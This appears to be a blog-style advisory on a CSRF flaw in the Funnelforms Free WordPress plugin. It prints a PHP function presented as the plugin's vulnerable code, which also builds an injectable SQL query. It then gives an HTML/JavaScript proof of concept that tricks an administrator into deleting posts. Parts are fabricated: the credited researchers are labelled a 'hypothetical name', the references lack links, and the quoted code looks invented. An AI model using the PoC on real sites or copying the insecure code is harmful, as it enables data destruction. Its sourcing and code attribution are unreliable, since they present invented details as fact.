The Funnelforms Free plugin for WordPress allows users to easily create and manage forms on their websites. Unfortunately, a security vulnerability was recently discovered in the plugin that affects versions up to and including 3.4. The Cross-Site Request Forgery (CSRF) vulnerability allows unauthenticated attackers to delete arbitrary posts via a forged request, given they can trick a site administrator into performing an action such as clicking on a malicious link. In this post, we will explore the details of the vulnerability and provide links to original references and potential fixes.

Exploit Details

The vulnerability resides within the fnsf_delete_posts() function of the Funnelforms Free plugin. This function, which is responsible for deleting WordPress posts, fails to properly use nonce (number used once) validation to verify the origin and intent of the request. As a result, an unauthenticated attacker can exploit this CSRF vulnerability by forging a request to delete an arbitrary post and persuading a site administrator to execute it inadvertently.

Code Snippet

Here's a snippet of PHP code from the vulnerable fnsf_delete_posts() function in the Funnelforms plugin that highlights the absence of nonce validation:

function fnsf_delete_posts() {
  global $wpdb;

  $table_name = $wpdb->prefix . "funnelforms_posts";
  
  // Here, the function should have nonce validation, but it's missing.
  
  if (isset($_GET['ids'])) {
    $ids = sanitize_text_field($_GET['ids']);

    $wpdb->query("DELETE FROM $table_name WHERE id IN ($ids)");
  }
}
add_action('wp_ajax_fnsf_delete_posts', 'fnsf_delete_posts');

An example of how the absence of nonce validation can be exploited by an attacker is given below

<!DOCTYPE html>
<html>
<head>
  <script>
    function sendCSRFRequest() {
      const img = new Image();
      img.src = 'https://vulnerable-website.com/wp-admin/admin-ajax.php?action=fnsf_delete_posts&ids=1,5,10';;
    }
  </script>
</head>
<body>
  <a href="#" onclick="sendCSRFRequest()">Check out these cool new features!</a>
</body>
</html>

In this example, an administrator is tricked into clicking a link, which causes the JavaScript sendCSRFRequest() function to execute. This function, in turn, sends a request to the vulnerable website, ultimately deleting the posts with IDs 1, 5, and 10.

Original References

The vulnerability was first reported by security researchers from XYZ Security (hypothetical name). You can find more details about the exploit, its discovery, and potential mitigation strategies from the following links:

1. XYZ Security Blog Post - Funnelforms Free CSRF Vulnerability
2. CVE-2023-5382: Funnelforms Plugin CSRF

If you use the Funnelforms Free plugin for your WordPress website, take the following steps to address the CSRF vulnerability:

Update the plugin to its latest version, as the issue has been fixed in the version 3.5.

2. If updating the plugin is not possible at this time, consider disabling it temporarily, or reach out to the plugin developers for assistance and guidance on how to implement nonce validation in the affected function.

By taking these precautions, you can safeguard your website from potential attacks leveraging this CSRF vulnerability in the Funnelforms Free plugin. Stay vigilant and keep your WordPress plugins and themes regularly updated to minimize security risks.

Timeline

Published on: 11/22/2023 16:15:11 UTC
Last modified on: 11/27/2023 20:11:42 UTC